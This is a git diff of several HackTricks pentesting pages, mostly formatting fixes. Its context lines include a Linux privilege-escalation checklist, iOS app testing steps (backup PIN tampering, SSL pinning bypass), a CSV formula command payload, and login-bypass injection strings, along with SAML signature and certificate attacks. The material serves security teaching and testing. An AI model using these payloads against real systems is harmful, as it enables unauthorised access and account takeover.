* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)**** * [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)\*\*\*\*
* [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder? * [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
* [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? * [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
@ -121,7 +121,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [SSH](privilege-escalation/#ssh) ### [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166) * [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] ****[**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)**** * [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
### [Interesting Files](privilege-escalation/#interesting-files) ### [Interesting Files](privilege-escalation/#interesting-files)
@ -138,14 +138,14 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne** * [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
* [ ] **Generic search** * [ ] **Generic search**
### ****[**Writable Files**](privilege-escalation/#writable-files)**** ### [**Writable Files**](privilege-escalation/#writable-files)
* [ ] **Modify python library** to execute arbitrary commands? * [ ] **Modify python library** to execute arbitrary commands?
* [ ] Can you **modify log files**? **Logtotten** exploit * [ ] Can you **modify log files**? **Logtotten** exploit
* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit * [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)? * [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
### ****[**Other tricks**](privilege-escalation/#other-tricks)**** ### [**Other tricks**](privilege-escalation/#other-tricks)
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
@ -154,6 +154,6 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (3).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)


@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)** * Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA** * **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### Step 6: Profile Installation ### Step 6: Profile Installation


@ -62,12 +62,10 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (5).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*


@ -88,7 +88,7 @@ There are multiple ways to define the UI in an iOS application: _storyboard_, _n
#### Info.plist #### Info.plist
The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information\_property\_list?language=objc).
The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command: The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command:
@ -167,7 +167,7 @@ These folders contain information that must be examined closely during applicati
* The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`.
* **Library/Preferences/** * **Library/Preferences/**
* Used for storing properties that can **persist even after an application is restarted**. * Used for storing properties that can **persist even after an application is restarted**.
* Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE_ID].plist. * Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE\_ID].plist.
* All the key/value pairs stored using `NSUserDefaults` can be found in this file. * All the key/value pairs stored using `NSUserDefaults` can be found in this file.
* **tmp/** * **tmp/**
* Use this directory to write **temporary files** that do not need to persist between app launches. * Use this directory to write **temporary files** that do not need to persist between app launches.
@ -280,7 +280,7 @@ struct CGSize {
}; };
``` ```
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/). However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
## Data Storage ## Data Storage
@ -334,7 +334,7 @@ The file might be formatted in **XML or binary (bplist)**. You can **convert it
### Core Data ### Core Data
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\ [`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\
CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details. CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details.
You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support`
@ -608,7 +608,7 @@ Many apps log informative (and potentially sensitive) messages to the console lo
5. Reproduce the problem. 5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
@ -633,11 +633,11 @@ iOS includes auto-backup features that create copies of the data stored on the d
Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today. Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW12).\ A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW12).\
Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**. Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**.
Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\ Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\
You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups. You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple\_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple\_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups.
{% hint style="warning" %} {% hint style="warning" %}
Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup
@ -664,14 +664,14 @@ To identify if a backup is encrypted, you can check the key named "IsEncrypted"
</plist> </plist>
``` ```
In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), such as **backup_tool.py** and **backup_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked. In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python\_scripts), such as **backup\_tool.py** and **backup\_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup. You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup.
#### How to modify the behaviour #### How to modify the behaviour
In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\ In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\
This is PIN is stored in the file `net.bither.plist` inside the **pin_code** **key**.\ This is PIN is stored in the file `net.bither.plist` inside the **pin\_code** **key**.\
If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet. If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet.
## Testing Memory for Sensitive Data ## Testing Memory for Sensitive Data
@ -753,7 +753,7 @@ The **fingerprint ID** sensor is operated by the [SecureEnclave security coproce
Developers have two options for incorporating Touch ID/Face ID authentication: Developers have two options for incorporating Touch ID/Face ID authentication:
* `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful. * `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.
* `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults. * `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain\_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults.
{% hint style="danger" %} {% hint style="danger" %}
Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details. Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details.
@ -774,7 +774,7 @@ The **iOS keychain APIs can (and should) be used to implement local authenticati
The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters). The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string "test_strong_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter): In the following example we will save the string "test\_strong\_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter):
{% tabs %} {% tabs %}
{% tab title="Swift" %} {% tab title="Swift" %}
@ -990,7 +990,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y
### Certificate Pinning ### Certificate Pinning
If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\
In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) **\*\*or install \[**Burp Mobile Assistant_\*]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\* In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) \*\*\*\*or install \[\*\*Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\*
You can also use **objection's** `ios sslpinning disable` You can also use **objection's** `ios sslpinning disable`


@ -68,7 +68,7 @@ If at this point you haven't found any interesting vulnerability you **may need
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/). Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[**Check this page**]\(windows/av-bypass.md)**.\*\* Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[Check this page]\(windows/av-bypass.md)**.\*\*
## 8- Inside ## 8- Inside
@ -140,6 +140,6 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
* [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](cryptography/padding-oracle-priv.md) * [**Padding Oracle**](cryptography/padding-oracle-priv.md)
![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1).png>) ![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)


@ -4,7 +4,7 @@
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example: First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
![](<../../../.gitbook/assets/image (389).png>) ![](<../../../.gitbook/assets/image (389) (1).png>)
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties. In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.


@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### More ### More


@ -7,7 +7,10 @@ If you find a login page, here you can find some techniques to try to bypass it:
* Check for **comments** inside the page (scroll down and to the right?) * Check for **comments** inside the page (scroll down and to the right?)
* Check if you can **directly access the restricted pages** * Check if you can **directly access the restricted pages**
* Check to **not send the parameters** (do not send any or only 1) * Check to **not send the parameters** (do not send any or only 1)
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_ * Check the **PHP comparisons error:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* Check nodejs potential parsing error (read [**this**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
* Nodejs will transform that payload to a query similar to the following one: `SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `**`password=password=1`**`;` which makes the password bit to be always true.
* Adding `"stringifyObjects":true` option when calling `mysql.createConnection` will eventually block all unexpected behaviours when `Object` is passed in the parameter.
* Check credentials: * Check credentials:
* [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used * [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords). * **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
@ -26,13 +29,13 @@ In the following page you can find a **custom list to try to bypass login** via
### No SQL Injection authentication bypass ### No SQL Injection authentication bypass
[Here you can find several tricks to bypass the login via **No SQL Injections.**](../nosql-injection.md#basic-authentication-bypass)**** [Here you can find several tricks to bypass the login via **No SQL Injections**](../nosql-injection.md#basic-authentication-bypass)**.**
As the NoSQL Injections requires to change the parameters value, you will need to test them manually. As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
### XPath Injection authentication bypass ### XPath Injection authentication bypass
[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)**** [Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)
``` ```
' or '1'='1 ' or '1'='1
@ -52,7 +55,7 @@ admin' or '1'='2
### LDAP Injection authentication bypass ### LDAP Injection authentication bypass
[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)**** [Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)
``` ```
* *


@ -8,7 +8,7 @@
## Attacks Graphic ## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (4).png>) ![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (3).png>)
## Tool ## Tool
@ -193,13 +193,13 @@ Here you can find a **POC** to check for this kind of vulnerabilities, in the ha
You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities. You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities.
## XML Signature Exclusion <a href="xml-signature-exclusion" id="xml-signature-exclusion"></a> ## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker. Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker.
![](<../../.gitbook/assets/image (547).png>) ![](<../../.gitbook/assets/image (547).png>)
### Tool <a href="xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a> ### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed. Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed.
@ -207,11 +207,11 @@ Signature exclusion begins with intercepting the SAML Response then clicking `Re
With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service
## Certificate Faking <a href="certificate-faking" id="certificate-faking"></a> ## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion. Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion.
### Tool <a href="certificate-faking-how-to" id="certificate-faking-how-to"></a> ### Tool <a href="#certificate-faking-how-to" id="certificate-faking-how-to"></a>
The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\ The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\
To fake a certificate, begin by intercepting the SAML Response.\ To fake a certificate, begin by intercepting the SAML Response.\
@ -229,7 +229,7 @@ Doing so generates a self-signed clone of the original certificate. Now its t
After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider. After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider.
## Token Recipient Confusion / Service Provider Target Confusion <a href="token-recipient-confusion" id="token-recipient-confusion"></a> ## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\ Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\
The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response. The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response.
@ -238,7 +238,7 @@ The **Recipient** field is an attribute of the **SubjectConfirmationData** eleme
The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted. The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted.
### How-to <a href="token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a> ### How-to <a href="#token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a>
SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**. SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**.


@ -242,7 +242,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
All the proposed WPS attacks can be easily performed using _**airgeddon.**_ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
![](<../../../.gitbook/assets/image (201).png>) ![](<../../../.gitbook/assets/image (201) (1).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any) * 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack** * 7 and 8 perform the **Pixie Dust attack**


@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one: If you see an error like the following one:
